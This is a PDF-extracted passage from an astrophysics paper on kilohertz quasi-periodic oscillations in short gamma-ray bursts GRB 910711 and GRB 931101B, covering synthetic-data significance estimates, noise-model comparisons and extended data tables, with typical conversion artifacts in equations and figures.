+ F = Fback + Fm{1 + tanh[(t − tm)/tr]}
1325
+ (5)
1326
+ times 1 if t < tp or times exp[−(t − tp)/td] if
1327
+ t ≥ tp. Thus Fback is the background count
1328
+ rate, Fm is related to the flux of the burst,
1329
+ tm is a characteristic time for the onset of the
1330
+ burst, tr is the rise time, tp is the time when the
1331
+ exponential decay starts, and td is the decay
1332
+
1333
+ Springer Nature 2021 LATEX template
1334
+ 12
1335
+ kHz QPOs in sGRBs
1336
+ time. Other fits are possible. For example, we
1337
+ could use a fit in which the light curve is rep-
1338
+ resented by one exponential rising to a peak,
1339
+ and then another exponential falling from that
1340
+ peak [55]. However, we find that our fit is pre-
1341
+ ferred strongly: for example, for GRB 910711,
1342
+ the maximum likelihood of our fit is ∼ 8 × 105
1343
+ times larger than the maximum likelihood of
1344
+ the double-exponential fit.
1345
+ In Extended Data Table 1 we give the best-
1346
+ fit values of these six parameters for each of
1347
+ the two segments in which we find signals. Note
1348
+ that for GRB 931101B, tp < tm, which sim-
1349
+ ply indicates that this burst has a somewhat
1350
+ gradual rise and decline.
1351
+ 2. We perform a Poisson draw at each time bin of
1352
+ 2 microseconds to obtain a light curve. These
1353
+ light curves, by design, have no QPOs and thus
1354
+ analysis of them gives a sense for the probabil-
1355
+ ity of a false positive identification of a QPO
1356
+ or QPOs given the non-stationary count rate.
1357
+ In panels a and b of Extended Data Figure 5
1358
+ we show the data, the smoothed fit, and a rep-
1359
+ resentative Poisson draw for each of our two
1360
+ bursts.
1361
+ 3. We then compute the power spectrum and are
1362
+ ready to perform our analysis to search for
1363
+ QPOs in the synthetic data. In panels c and
1364
+ d of Extended Data Figure 5 we show the
1365
+ power spectra obtained for the representative
1366
+ examples presented in the left panel.
1367
+ Estimates of significance of signals.
1368
+ We per-
1369
+ form the steps outlined in the previous Section
1370
+ repeatedly for each of our two bursts to search the
1371
+ synthetic data for signals as strong as or stronger
1372
+ than those we found in the BATSE data. This
1373
+ gives us two distributions of ∆ ln L2
1374
+ 0, representa-
1375
+ tive of GRB 910711-like and GRB 931101B-like
1376
+ light curves. For each burst, we therefore conclude:
1377
+ 1. For GRB 910711-like synthetic data, we per-
1378
+ form ≈ 14, 000 simulations and find none with
1379
+ ∆ ln L2
1380
+ 0 as large as in the actual GRB 910711
1381
+ data, which suggests that the false positive
1382
+ probability for this signal is <∼ 10−4.
1383
+ 2. For GRB 931101B-like synthetic data, we per-
1384
+ form 4,000 simulations and find 7 with ∆ ln L2
1385
+ 0
1386
+ at least as large as in the actual GRB 931101B.
1387
+ Thus we can roughly assign a probability of
1388
+ ∼ 1 − 2 × 10−3 for the GRB 931101B signal.
1389
+ We show the distributions of the synthetic
1390
+ ∆ ln L2
1391
+ 0 for GRB 910711-like and GRB 931101B-
1392
+ like data in panels e and f of Extended Data
1393
+ Figure 5. Note that these distributions extend to
1394
+ far larger ∆ ln L than the bulk of our distribution
1395
+ of BATSE data (see Extended Data Figure 4); in
1396
+ this sense, GRB 910711 and GRB 931101B are not
1397
+ typical bursts.
1398
+ Given that none of our ≈ 14, 000 GRB 910711-
1399
+ like synthetic data sets reached a ∆ ln L2
1400
+ 0 as high
1401
+ or higher than what we see in the BATSE data, to
1402
+ obtain a more precise estimate of the significance
1403
+ of this signal we need to extrapolate. We see from
1404
+ Extended Data Figure 5 that at the high-∆ ln L2
1405
+ 0
1406
+ end, the distribution appears linear on a log-linear
1407
+ plot, and is therefore well fit with an exponential.
1408
+ Performing such a fit using the top 3% of ∆ ln L2
1409
+ 0
1410
+ values for the GRB 910711-like synthetic data sets
1411
+ yields a probability, in a single realization, of
1412
+ Prob(∆ ln L2
1413
+ 0 ≥ x) = 0.03 e− (27.9−x)
1414
+ 4.57
1415
+ .
1416
+ (6)
1417
+ For ∆ ln L2
1418
+ 0 > 56.4 (the value for GRB 910711),
1419
+ this implies Prob(∆ ln L2
1420
+ 0 > 56.4) ≈ 6 × 10−5.
1421
+ That is, the probability of a false positive, in a
1422
+ single realization, for the QPOs in GRB 910711 is
1423
+ approximately 6 × 10−5.
1424
+ We now need to estimate the probability of
1425
+ ∆ ln L2
1426
+ 0 > 56.4 taking into account the number of
1427
+ trials, that is, considering all of the bursts that we
1428
+ analyze (as the same method is used in both cases,
1429
+ the search for QPOs in each synthetic light curve
1430
+ has the same number of trials as the search for
1431
+ QPOs in each BATSE light curve). We find that,
1432
+ for each burst, the probability of a given large
1433
+ ∆ ln L2
1434
+ 0 depends strongly on the duration T90 of
1435
+ the burst (although obviously the specific shape of
1436
+ the burst light curve and the number of counts in
1437
+ the burst also play roles). This is plausible given
1438
+ the argument that the probability of a false pos-
1439
+ itive in a segment is greater when the duration
1440
+ of the burst is a smaller fraction of the duration
1441
+ of the segment [55]. Quantitatively, we performed
1442
+ 2,000 simulations each on the light curves of five
1443
+ other T90 < 100 ms BATSE bursts with good data
1444
+ [33]: these were GRBs 910508, 910625, 910703,
1445
+ 930113C, and 940621C. As with GRB 910711, we
1446
+ performed exponential fits to the top 3% of ∆ ln L2
1447
+ 0
1448
+ values. In Extended Data Table 2 we show the
1449
+ extrapolated probability of ∆ ln L2
1450
+ 0 > 56.4 for each
1451
+ of these bursts, along with their T90.
1452
+
1453
+ Springer Nature 2021 LATEX template
1454
+ kHz QPOs in sGRBs
1455
+ 13
1456
+ Extended Data Table
1457
+ 1 | Model parameters used in synthetic data
1458
+ GRB
1459
+ Fback
1460
+ Fm
1461
+ tm
1462
+ tr
1463
+ tp
1464
+ td
1465
+ 910711
1466
+ 8.764
1467
+ 44.209
1468
+ 98.323
1469
+ 0.472
1470
+ 103.11
1471
+ 2.472
1472
+ 931101B
1473
+ 2.330
1474
+ 255.65
1475
+ 46.950
1476
+ 8.609
1477
+ 33.048
1478
+ 2.958
1479
+ Note: parameters for our synthetic data runs modeling QPO-free light curves based on models of the light curves from our two
1480
+ BATSE data segments where we find QPOs. See text and especially Equation 5 for details. Here the count rates Fback and Fm are
1481
+ in counts per millisecond, and the times are all in milliseconds; the zeros of time for tm and tp are shown in Figure 2.
1482
+ 0
1483
+ 10
1484
+ 20
1485
+ 30
1486
+
1487
+
1488
+
1489
+
1490
+ a
1491
+ GRB910711
1492
+ counts
1493
+ data
1494
+ synth
1495
+ fit
1496
+ 0
1497
+ 2
1498
+ 4
1499
+ 6
1500
+ 8
1501
+ 150
1502
+ 160
1503
+ 170
1504
+ 180
1505
+ b
1506
+ GRB931101B
1507
+ counts
1508
+ time (ms)
1509
+ 0
1510
+ 4
1511
+ 8
1512
+
1513
+
1514
+
1515
+
1516
+
1517
+ c
1518
+ power
1519
+ 3σ-noise
1520
+ 2σ-noise
1521
+ 1σ-noise
1522
+ 0
1523
+ 4
1524
+ 8
1525
+ 1000
1526
+ 2000
1527
+ 3000
1528
+ 4000
1529
+ 5000
1530
+ d
1531
+ power
1532
+ frequency (Hz)
1533
+ 10-5
1534
+ 10-4
1535
+ 10-3
1536
+ 10-2
1537
+ 10-1
1538
+ 100
1539
+
1540
+
1541
+
1542
+
1543
+
1544
+
1545
+
1546
+ p = 6 x 10-5
1547
+ (GRB910711)
1548
+ e
1549
+ GRB910711-like
1550
+ synthetic sample
1551
+ probability distribution
1552
+ exponential extrapolation
1553
+ 10-5
1554
+ 10-4
1555
+ 10-3
1556
+ 10-2
1557
+ 10-1
1558
+ 100
1559
+ 0
1560
+ 10
1561
+ 20
1562
+ 30
1563
+ 40
1564
+ 50
1565
+ 60
1566
+ p = 1 x 10-3
1567
+ (GRB931101B)
1568
+ f
1569
+ GRB931101B-like
1570
+ synthetic sample
1571
+ probability distribution
1572
+ ∆ ln L2
1573
+ 0
1574
+ Extended Data Fig.
1575
+ 5 | Real versus synthetic data a, Zoom-in on the QPO data segment for GRB 910711,
1576
+ a corresponding smoothed fits given by eq. (5) and a representative example of the synthetic light curve obtained via
1577
+ Poisson sampling from the smoothed fits (the starting time of the GRB 910711 light curve is shifted here for convenience
1578
+ of presentation). c, Power spectrum of the synthetic light curve shown in a. As in Figure 3, the red bands show the 1σ,
1579
+ 2σ, and 3σ powers expected given the best white noise only fits to the data from each burst. e, Probability distribution
1580
+ of ∆ ln L2
1581
+ 0 from synthetic data generated from light curve fits to GRB 910711. The vertical dotted line shows the ∆ ln L2
1582
+ 0
1583
+ observed in BATSE data, and the diagonal dashed line shows the exponential fit to the top 3% of the synthetic data points
1584
+ (see “Estimates of significance of signals” for details). The inset number gives the estimated false positive probability for
1585
+ signals as strong as or stronger than that observed. b, d, f, Similarly, for GRB 931101B.
1586
+ We see in Extended Data Table 2 that there is
1587
+ a steep decline in the probability of a high ∆ ln L2
1588
+ 0
1589
+ with increasing T90. Based on this analysis, it
1590
+ seems likely that the expected number of false pos-
1591
+ itives with ∆ ln L2
1592
+ 0 > 56.4 in the entire sample of
1593
+ bursts is dominated by the expected number of
1594
+ false positives for the single burst GRB 910711
1595
+ (as the probabilities in Extended Data Table 2 are
1596
+ small [given by exponential extrapolations of the
1597
+ form (6)], they can be used interchangeably with
1598
+ the number of false positives in each case). That
1599
+ is, the expected number of false positives in the
1600
+ entire catalog, Nfalse,catalog(∆ ln L2
1601
+ 0 > 56.4), is
1602
+
1603
+ i
1604
+ Nfalse,i
1605
+
1606
+ ∆ ln L2
1607
+ 0 > 56.4
1608
+
1609
+ ∼ 6 × 10−5 ,
1610
+ where i runs over all bursts. We therefore con-
1611
+ clude that the significance of the QPO signal in
1612
+ GRB 910711, when all trials over all bursts are
1613
+ taken into account, is ∼ 6 × 10−5.
1614
+ We can then ask the question: what is the
1615
+ probability that in our sample we would see a
1616
+ burst with ∆ ln L2
1617
+ 0 > 56.4 (like GRB 910711)
1618
+ and a second burst with ∆ ln L2
1619
+ 0 > 33.3 (like
1620
+ GRB 931101B)? In Extended Data Table 2 we
1621
+ therefore also show the extrapolated probabil-
1622
+ ity of ∆ ln L2
1623
+ 0
1624
+ > 33.3. The expected number
1625
+
1626
+ Springer Nature 2021 LATEX template
1627
+ 14
1628
+ kHz QPOs in sGRBs
1629
+ Extended Data Table
1630
+ 2 | Extrapolated probabilities of ∆ ln L2
1631
+ 0 for different short bursts
1632
+ GRB
1633
+ Trigger #
1634
+ T90 (ms)
1635
+ Counts Prob(∆ ln L2
1636
+ 0 > 56.4)
1637
+ Prob(∆ ln L2
1638
+ 0 > 33.3)
1639
+ 910711
1640
+ 512
1641
+ 14
1642
+ 1790
1643
+ 5.9 × 10−5
1644
+ 9.2 × 10−3
1645
+ 910508
1646
+ 207
1647
+ 30
1648
+ 1254
1649
+ 2.2 × 10−6
1650
+ 1.6 × 10−3
1651
+ 931101B
1652
+ 2615
1653
+ 34
1654
+ 524
1655
+ 2.6 × 10−6
1656
+ 1.3 × 10−3
1657
+ 910625
1658
+ 432
1659
+ 50
1660
+ 1810
1661
+ 7.2 × 10−7
1662
+ 9.3 × 10−4
1663
+ 910703
1664
+ 480
1665
+ 62
1666
+ 2278
1667
+ 1.8 × 10−7
1668
+ 7.5 × 10−4
1669
+ 940621C
1670
+ 3037
1671
+ 66
1672
+ 710
1673
+ 2.0 × 10−10
1674
+ 7.9 × 10−6
1675
+ 930113C
1676
+ 2132
1677
+ 90
1678
+ 612
1679
+ 4.1 × 10−11
1680
+ 2.9 × 10−6
1681
+ Note: probabilities, extrapolated using an exponential fit, that synthetic data generated using the light curves of each of the
1682
+ bursts with durations T90 < 100 ms (third column) and good data would produce ∆ ln L2
1683
+ 0 > 56.4 (fifth column), which is the value
1684
+ obtained using the BATSE data for GRB 910711, and ∆ ln L2
1685
+ 0 > 33.3 (sixth column), which is the value obtained using the BATSE
1686
+ data for GRB 931101B. The fourth column gives the total number of counts in the 0.131072-second segment that we analyzed,
1687
+ rather than the counts summed over the T90 of the burst. We see that both probabilities decrease steeply with increasing duration.
1688
+ The bursts where we find QPOs are highlighted in boldface.
1689
+ of false signals in the whole catalog is then
1690
+ Nfalse,catalog(∆ ln L2
1691
+ 0 > 56.4 and ∆ ln L2
1692
+ 0 > 33.3),
1693
+ given by
1694
+
1695
+ i
1696
+
1697
+ Nfalse,i
1698
+
1699
+ ∆ ln L2
1700
+ 0 > 56.4
1701
+
1702
+ ×
1703
+
1704
+ ��
1705
+ i̸=j
1706
+ Nfalse,i
1707
+
1708
+ ∆ ln L2
1709
+ 0 > 33.3
1710
+
1711
+
1712
+
1713
+
1714
+ ∼ 3 × 10−7 ,
1715
+ where i again runs over all bursts and j runs
1716
+ over all bursts other than i. We thus conclude
1717
+ that the combined significance of the QPO signals
1718
+ detected in both GRB 910711 and GRB 931101B
1719
+ is ∼ 3 × 10−7, taking into account all trials over
1720
+ all bursts. The addition of the Swift/BAT and
1721
+ Fermi/GBM bursts we analyzed does not impact
1722
+ this result. There were 14 Fermi/GBM bursts
1723
+ with T90 < 100 ms, but the GBM data included
1724
+ only the duration of each burst in each case (not
1725
+ including portions of pre- and post-burst low-
1726
+ count background data), therefore mitigating this
1727
+ possible cause of false QPOs [55]. There were
1728
+ no Swift/BAT bursts in our sample with T90 <
1729
+ 100 ms.
1730
+ Short GRBs vs. SGR giant flares.
1731
+ As noted
1732
+ in the main text, tentative evidence for a kilo-
1733
+ hertz QPO in a giant flare from the Galactic
1734
+ SGR 1806−20 has been reported [34] as well
1735
+ as kilohertz QPOs from an SGR giant flare in
1736
+ NGC 253 [35]. Moreover, it has been proposed that
1737
+ many of the shortest gamma-ray bursts are giant
1738
+ flares from SGRs rather than neutron star merg-
1739
+ ers [57]. It is therefore useful to explore how to
1740
+ distinguish the giant flare from the neutron star
1741
+ merger scenario.
1742
+ The most definitive distinction would come
1743
+ from an identification of the host galaxy, because
1744
+ SGR giant flares do not reach the isotropic equiv-
1745
+ alent energy or luminosity of double neutron star
1746
+ mergers. However, BATSE localizations are only
1747
+ to several square degrees and thus clear host
1748
+ identification is impossible.
1749
+ Nonetheless, energetics do distinguish between
1750
+ our bursts and the giant flare sample [57].
1751
+ Extended Data Table 3 gives the implied min-
1752
+ imum equivalent isotropic energy and isotropic
1753
+ peak luminosity for each of our bursts, based on
1754
+ the minimum distance of a galaxy consistent with
1755
+ the burst localizations. We see that even if we take
1756
+ the minimum galaxy distance irrespective of star
1757
+ formation rate, the required Liso are extreme; for
1758
+ comparison, the maximum Liso in the candidate
1759
+ giant flare list [57] was 1.8 × 1048 erg s−1.
1760
+ If we restrict consideration to only galaxies
1761
+ with at least moderately active star formation,
1762
+ given that magnetar giant flare activity is thought
1763
+ to come from neutron stars with very young ages
1764
+ <∼ 104 years, then both Eiso (compare with the
1765
+ maximum of 5.3 × 1046 erg in the giant flare
1766
+ sample [57]) and Liso stand out compared with
1767
+ the suggested giant flare sample. This provides
1768
+ an argument that our bursts are classical short
1769
+
1770
+ Springer Nature 2021 LATEX template
1771
+ kHz QPOs in sGRBs
1772
+ 15
1773
+ gamma-ray bursts, and thus are likely to be pro-
1774
+ duced by neutron star mergers, rather than being
1775
+ giant flares from SGRs.
1776
+ Comparison
1777
+ with
1778
+ numerical
1779
+ relativity
1780
+ results.
1781
+ The frequencies of the main QPO peak
1782
+ in simulations of binary neutron star mergers
1783
+ range from 1.8 − 3.8 kHz [9], depending on the
1784
+ neutron star equation of state and on the indi-
1785
+ vidual masses of the neutron stars in the binary.
1786
+ The values obtained for these frequencies are
1787
+ remarkably consistent across different groups,
1788
+ as evidenced by tests which achieved differences
1789
+ smaller than the scatter of the proposed phe-
1790
+ nomenological relations [13]. These frequency
1791
+ values are also consistent with the QPOs we
1792
+ present in this work. The quality factors of the
1793
+ ν2 QPOs we find are Q ∼ 50 − 100, which are a
1794
+ few times times higher than the quality factors
1795
+ Q ∼ 10 − 20 estimated from the simulations
1796
+ [5, 9, 13, 62]; in contrast to the frequencies, which
1797
+ are very similar among different simulations,
1798
+ there is less agreement between simulations about
1799
+ the quality factor. This is because the lifetime of
1800
+ an HMNS in a simulation is sensitive to numer-
1801
+ ical details of the evolution codes. Additionally,
1802
+ it is expected that the quality factors obtained
1803
+ from numerical relativity are lower limits, due to
1804
+ numerical dissipation [63].
1805
+ Additional
1806
+ analysis
1807
+ with
1808
+ adjustable
1809
+ red
1810
+ noise.
1811
+ We have also performed analyses of our
1812
+ two signals using red noise instead of white
1813
+ noise. For these analyses, the noise contributes
1814
+ Ared(f/500 Hz)p to the power, where the prior for
1815
+ Ared is flat between 0 and 5 and the prior for p
1816
+ is flat between −3 and +1 (thus allowing for blue
1817
+ noise).
1818
+ From Extended Data Table 4 we see that the
1819
+ log likelihoods of the noise only, noise + 1 QPO
1820
+ and noise + 2 QPO fits are not increased signifi-
1821
+ cantly when, in each case, white noise is replace by
1822
+ red noise. Therefore, the fits are not improved sig-
1823
+ nificantly by the use of red noise instead of white
1824
+ noise.
1825
+ Moreover, Extended Data Table 4 shows that
1826
+ ∆ ln L2
1827
+ 0 for GRB 910711 is only slightly enhanced
1828
+ if we use the red noise models (∆ ln L2
1829
+ 0 = 57.2 −
1830
+ 0.1 = 57.1) compared with the white noise mod-
1831
+ els (∆ ln L2
1832
+ 0 = 56.4); for GRB 931101B, ∆ ln L2
1833
+ 0
1834
+ is slightly reduced if we use the red noise mod-
1835
+ els (∆ ln L2
1836
+ 0 = 33.6 − 2.3 = 31.3) compared with
1837
+ the white noise models (∆ ln L2
1838
+ 0 = 33.3). From
1839
+ this we conclude that the choice of noise model
1840
+ (red or white) does not affect how much the noise
1841
+ + 2 QPOs model is preferred over the noise-only
1842
+ model. Finally, Extended Data Table 4 shows that
1843
+ the best-fit frequencies and frequency widths are
1844
+ virtually identical between the white noise and the
1845
+ red noise fits.
1846
+ Use of Poisson only instead of white noise as
1847
+ background.
1848
+ Our fiducial models include white
1849
+ noise as well as, possibly, Lorentzian QPOs. As
1850
+ indicated above, the motivation for considering
1851
+ white noise is that spikes in the Swift/BAT data
1852
+ introduce large amounts of extra white noise into
1853
+ the power spectra, so this needs to be taken into
1854
+ account. However, the BATSE data sets we ana-
1855
+ lyze, after removal of segments with large amounts
1856
+ of f > 500 Hz red noise, do not have spikes. This
1857
+ suggests that, instead, it could be interesting to
1858
+ consider models in which the noise is purely Pois-
1859
+ son, e.g., for a noise-only model the picture would
1860
+ be that the intrinsic count rate is steady and thus
1861
+ the only contributor to the power spectrum is
1862
+ photon counting noise, i.e., Poisson noise.
1863
+ Although
1864
+ we
1865
+ have
1866
+ not
1867
+ reanalyzed
1868
+ all
1869
+ of
1870
+ the data sets with Poisson+QPO(s) models, a
1871
+ Poisson-only model is fast to evaluate. When
1872
+ we do this, we find that our strongest signal
1873
+ GRB 910711 stands out even more from the syn-
1874
+ thetic light curves. Exponential extrapolations of
1875
+ the type describe above suggest that the expected
1876
+ number of false positives per GRB 910711-like
1877
+ light curve is ∼ few × 10−7, i.e., that the signal
1878
+ is at least 100× more significant than what we
1879
+ inferred from our white noise models. (The signal
1880
+ would be even more significant if we were to make
1881
+ the [small] correction for detector deadtime, which
1882
+ lowers the Poisson power, as seen for example in
1883
+ the discovery of kHz QPOs in Scorpius X-1 [64].)
1884
+ As an aside, we also note that when we analyze
1885
+ the BATSE GRB 910711 data using models with
1886
+ Poisson noise plus some number of QPOs, this
1887
+ analysis identifies a third, weaker but still signifi-
1888
+ cant, QPO centered at ∼ 2070 Hz with a width of
1889
+ ∼ 90 Hz, and a fourth, even weaker and not obvi-
1890
+ ously significant, QPO centered at ∼ 3700 Hz with
1891
+ a width of ∼ 40 Hz. However, because we have not
1892
+ performed systematic studies using a Poisson noise
1893
+ background, we cannot assess these implications
1894
+ thoroughly.
1895
+
1896
+ Springer Nature 2021 LATEX template
1897
+ 16
1898
+ kHz QPOs in sGRBs
1899
+ Extended Data Table
1900
+ 3 | Fluences, fluxes, and distances of bursts with QPOs
1901
+ GRB
1902
+ 910711
1903
+ 931101B
1904
+ > 20 keV fluence (erg cm−2)
1905
+ 4.3 × 10−7 1.8 × 10−7
1906
+ Estimated maximum flux (erg cm−2 s−1)
1907
+ 1.5 × 10−4 2.6 × 10−5
1908
+ Minimum distance of galaxy (Mpc)
1909
+ 15.6
1910
+ 24.2
1911
+ Minimum Eiso (erg)
1912
+ 1.2 × 1046
1913
+ 1.2 × 1046
1914
+ Minimum peak Liso (erg s−1)
1915
+ 5 × 1048
1916
+ 2 × 1048
1917
+ Minimum distance of star forming galaxy (Mpc)
1918
+ 66.3
1919
+ 46.4
1920
+ Minimum Eiso for star forming galaxy (erg)
1921
+ 2.3 × 1047
1922
+ 4.8 × 1046
1923
+ Minimum peak Liso for star forming galaxy (erg s−1)
1924
+ 9 × 1049
1925
+ 7 × 1048
1926
+ Note: here Eiso and Liso are respectively the equivalent isotropic energy release and isotropic peak luminosity that would give
1927
+ the observed fluence and peak flux at the listed distances. We use the GLADE+ sample [58, 59], along with GRB localizations[60]
1928
+ (which is also our source for the > 20 keV fluence), to determine the closest galaxy, and the closest galaxy consistent with the
1929
+ direction to the GRB that has an absolute B magnitude equal to or brighter than the MB = −20.8 for the Galaxy [61]. The
1930
+ B magnitude threshold is based on the suggestion that giant flares from SGRs should be correlated with ongoing star formation
1931
+ because giant flares are thought to occur no more than ∼ 104 years after the birth of a neutron star[57].
1932
+ Extended Data Table
1933
+ 4 | Comparison between white noise and red noise fits
1934
+ GRB
1935
+ Fit
1936
+ Slope
1937
+ ν1 (Hz) ∆ν1 (Hz) ν2 (Hz) ∆ν2 (Hz) ln Lbest − ln Lwhite
1938
+ 910711
1939
+ White
1940
+ 0.0
1941
+ Red
1942
+ −0.15+0.19
1943
+ −0.2
1944
+ 0.1
1945
+ White + 1QPO
1946
+ 2649+6
1947
+ −7
1948
+ 26+9
1949
+ −7
1950
+ 29.7
1951
+ Red + 1QPO
1952
+ −0.28+0.23
1953
+ −0.23
1954
+ 2649+7
1955
+ −7
1956
+ 24+9
1957
+ −7
1958
+ 30.0
1959
+ White + 2QPOs
1960
+ 1113+7
1961
+ −8
1962
+ 25+9
1963
+ −7
1964
+ 2649+6
1965
+ −7
1966
+ 26+9
1967
+ −7
1968
+ 56.4
1969
+ Red + 2QPOs +0.15+0.36
1970
+ −0.41 1112+8
1971
+ −9
1972
+ 27+9
1973
+ −7
1974
+ 2648+7
1975
+ −8
1976
+ 28+10
1977
+ −8
1978
+ 57.2
1979
+ 931101B
1980
+ White
1981
+ 0.0
1982
+ Red
1983
+ −2.00+0.65
1984
+ −0.61
1985
+ 2.3
1986
+ White + 1QPO
1987
+ 2612+9
1988
+ −8
1989
+ 14+7
1990
+ −3
1991
+ 20.5
1992
+ Red + 1QPO
1993
+ −2.27+0.56
1994
+ −0.44
1995
+ 2611+5
1996
+ −7
1997
+ 14+5
1998
+ −3
1999
+ 22.5
2000
+ White + 2QPOs
2001
+ 877+6
2002
+ −8
2003
+ 15+7
2004
+ −2
2005
+ 2612+9
2006
+ −8
2007
+ 14+7
2008
+ −3
2009
+ 33.3
2010
+ Red + 2QPOs −2.19+0.74
2011
+ −0.44 879+10
2012
+ −10
2013
+ 16+12
2014
+ −4
2015
+ 2611+9
2016
+ −7
2017
+ 15+6
2018
+ −4
2019
+ 33.6
2020
+ Note: fits to the power densities of our two signals using our fiducial white noise background, and using instead a red noise
2021
+ background (see text for details). In each case we show the median and the ±1σ values of the parameters, and the final column
2022
+ gives the log likelihood of the best fit minus the log likelihood of the white noise only fit. The “Slope” column gives the slope of
2023
+ the noise fit when the noise is not required to be white; negative is red noise and positive is blue noise, and note that when red
2024
+ noise is preferred it only affects the lowest frequencies in our 500 Hz to 5000 Hz interval. Using red instead of white noise does not
2025
+ change significantly the parameter values or the delta log likelihoods.
2026
+ Detailed
2027
+ analysis
2028
+ of
2029
+ candidate
2030
+ signals.
2031
+ Extended Data Table 5 shows the best-fit param-
2032
+ eters for our two-QPO models for each of our two
2033
+ bursts. Extended Data Figure 6 places our bursts
2034
+ on a hardness ratio-duration plot for all BATSE
2035
+ bursts.
2036
+ In Extended Data Figure 7, we show the light
2037
+ curves, power spectra, and spectrograms for each
2038
+ energy channel of each burst and for the sum of
2039
+ counts over all four BATSE TTE energy channels.
2040
+ As both GRBs are bright and hard, a small cor-
2041
+ rection due to detector deadtime can be estimated
2042
+ [65], resulting in an effective deadtime of approxi-
2043
+ mately 1µs per photon that is much smaller than
2044
+ the period of our strongest QPO, 1/(2.6 kHz) ≃
2045
+ 400 µs. Given that a particular burst is detected
2046
+ by ∼ 4 of the eight BATSE detectors, this dead-
2047
+ time implies that we are missing approximately
2048
+
2049
+ Springer Nature 2021 LATEX template
2050
+ kHz QPOs in sGRBs
2051
+ 17
2052
+ Extended Data Table
2053
+ 5 | Best two-QPO fit to data from each burst
2054
+ GRB
2055
+ Trigger # Awhite
2056
+ A1
2057
+ arms
2058
+ osc1 ν1(Hz) ∆ν1 (Hz) A2
2059
+ arms
2060
+ osc2 ν2 (Hz) ∆ν2 (Hz)
2061
+ 910711
2062
+ 512
2063
+ 0.18
2064
+ 6.20 0.27
2065
+ 1113
2066
+ 26
2067
+ 7.10 0.28
2068
+ 2650
2069
+ 28
2070
+ 931101B
2071
+ 2615
2072
+ 0.003 5.57 0.32
2073
+ 878
2074
+ 13
2075
+ 7.55 0.34
2076
+ 2613
2077
+ 12
2078
+ Note: the parameter values for the best two-QPO fit to the power spectral data for each burst, which are also labeled by their
2079
+ BATSE trigger number. Here we also add the best estimate of the fractional root mean squared amplitudes of each QPO. The best
2080
+ values of the parameters need not be the same as the median values from Table 1, but the best values are all within the ±1σ ranges.
2081
+ For GRB 931101B the best-fit white-noise amplitude is very low, which indicates that the model has captured the signal power. In
2082
+ contrast, the best-fit white-noise amplitude for GRB 910711 is larger, which could suggest that there are additional QPOs or other
2083
+ features, but the evidence is not strong. If, for example, we add a third QPO to our fit then the best frequency is ∼ 2100 Hz and
2084
+ the best frequency width is ∼ 100 Hz, but the evidence is only ∼ 50% larger than the two-QPO evidence.
2085
+ 0.01
2086
+ 0.1
2087
+ 1
2088
+ 10
2089
+ 100
2090
+ 0.01
2091
+ 0.1
2092
+ 1
2093
+ 10
2094
+ 100
2095
+ S(100-300)/S(50-100)
2096
+ T90 (s)
2097
+ BATSE catalog
2098
+ GRB931101B
2099
+ GRB910711
2100
+ Extended Data Fig. 6 | Hardness-duration plot of
2101
+ BATSE gamma-ray bursts Here we show the hardness
2102
+ ratio (fluence in the 100−300 keV band divided by fluence
2103
+ in the 50 − 100 keV band) vs. T90 for the BATSE catalog
2104
+ (including both short and long GRBs), highlighting our
2105
+ signals. Error bars represent ±1σ uncertainties. The T90
2106
+ of some of the shortest bursts was re-calculated using the
2107
+ TTE data [33]. GRB 910711 and GRB 931101B are very
2108
+ short compared with most short GRBs, but the hardness
2109
+ ratios of our bursts do not stand out in the short GRB
2110
+ population.
2111
+ 2% of the counts in GRB 910711 and 0.5% of
2112
+ the counts in GRB 931101B on average during
2113
+ their whole duration (the percentage loss should
2114
+ be at most double these values at the peak of each
2115
+ burst).
2116
+ Although on balance the signals are strongest
2117
+ in the highest-energy channels 3 and 4, channel 2
2118
+ in GRB 931101B shows a substantial signal near
2119
+ the lower-frequency QPO. Moreover, examination
2120
+ of panels c and f of Figure 7 shows that the sig-
2121
+ nals can appear over short times even before the
2122
+ main burst, and that the signals tend to be in the
2123
+ early phases of the bursts. These properties may
2124
+ provide clues to the mechanism that makes the
2125
+ QPOs appear in gamma rays.
2126
+ Data availability.
2127
+ BATSE archival TTE data
2128
+ are available at [51].
2129
+ Code
2130
+ availability.
2131
+ Details about our codes
2132
+ have been published [31], but the code itself is not
2133
+ intended to be used publicly.
2134
+ References
2135
+ [43] Vaughan, S. A Bayesian test for periodic sig-
2136
+ nals in red noise. Mon. Not. R. Astron. Soc.
2137
+ 402 (1), 307–320 (2010).
2138
+ [44] Huppenkothen, D. et al.
2139
+ Quasi-periodic
2140
+ Oscillations and Broadband Variability in
2141
+ Short
2142
+ Magnetar
2143
+ Bursts.
2144
+ Astrophys.
2145
+ J.
2146
+ 768 (1), 87 (2013).
2147
+ [45] Huppenkothen, D. et al.
2148
+ Quasi-periodic
2149
+ Oscillations in Short Recurring Bursts of the
2150
+ Soft Gamma Repeater J1550-5418.
2151
+ Astro-
2152
+ phys. J. 787 (2), 128 (2014).
2153
+ [46] Huppenkothen, D., Heil, L. M., Watts, A. L.
2154
+ & G¨o˘g¨u¸s, E. Quasi-periodic Oscillations in
2155
+ Short Recurring Bursts of Magnetars SGR
2156
+ 1806-20 and SGR 1900+14 Observed with
2157
+ RXTE. Astrophys. J. 795 (2), 114 (2014).
2158
+ [47] Guidorzi, C., Dichiara, S.
2159
+ & Amati, L.
2160
+ Individual power density spectra of Swift
2161
+ gamma-ray bursts. AAP 589, A98 (2016).
2162
+ [48] Lewin, W. H. G., van Paradijs, J. & van der
2163
+ Klis, M.
2164
+ A review of quasi-periodic oscil-
2165
+ lations in low-mass X-ray binaries.
2166
+ Space
2167
+ Science Research 46 (3-4), 273–377 (1988).
2168
+
2169
+ Springer Nature 2021 LATEX template
2170
+ 18
2171
+ kHz QPOs in sGRBs
2172
+ 0
2173
+ 30
2174
+ 60
2175
+ 90
2176
+
2177
+
2178
+
2179
+
2180
+
2181
+
2182
+
2183
+ a
2184
+ GRB910711
2185
+ energy channel 1
2186
+ 0
2187
+ 30
2188
+ 60
2189
+ 90
2190
+
2191
+
2192
+
2193
+
2194
+
2195
+
2196
+
2197
+ energy channel 2
2198
+ 0
2199
+ 30
2200
+ 60
2201
+ 90
2202
+
2203
+
2204
+
2205
+
2206
+
2207
+
2208
+
2209
+ counts
2210
+ energy channel 3
2211
+ 0
2212
+ 30
2213
+ 60
2214
+ 90
2215
+
2216
+
2217
+
2218
+
2219
+
2220
+
2221
+
2222
+ energy channel 4
2223
+ 0
2224
+ 60
2225
+ 120
2226
+ 180
2227
+
2228
+
2229
+
2230
+
2231
+
2232
+
2233
+
2234
+ total
2235
